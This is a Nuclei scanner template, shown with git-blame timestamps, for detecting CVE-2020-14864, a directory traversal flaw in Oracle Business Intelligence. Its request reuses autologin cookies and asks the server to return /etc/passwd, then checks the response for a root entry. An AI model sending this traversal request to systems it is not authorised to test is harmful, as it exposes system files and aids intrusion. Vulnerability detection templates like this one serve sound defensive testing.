nuclei-templates/cves/2020/CVE-2020-14864.yaml

27 lines
1.0 KiB
YAML
Raw Normal View History

2020-10-29 09:54:06 +00:00
id: CVE-2020-14864
info:
name: Oracle Fusion - "getPreviewImage" Directory Traversal/Local File Inclusion
2020-10-29 10:13:50 +00:00
description: 'Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - "getPreviewImage" Directory Traversal/Local File Inclusion'
2020-10-29 09:54:06 +00:00
author: Ivo Palazzolo (@palaziv)
cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'
2020-10-29 09:54:06 +00:00
severity: high
2021-03-18 07:54:36 +00:00
tags: cve,cve2020,oracle,lfi
2021-03-12 07:10:16 +00:00
reference: |
2021-03-11 15:28:22 +00:00
- http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html
- https://www.oracle.com/security-alerts/cpuoct2020.html
2020-10-29 09:54:06 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies
- '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- 'root:[x*]:0:0'
2020-10-29 10:13:50 +00:00
part: body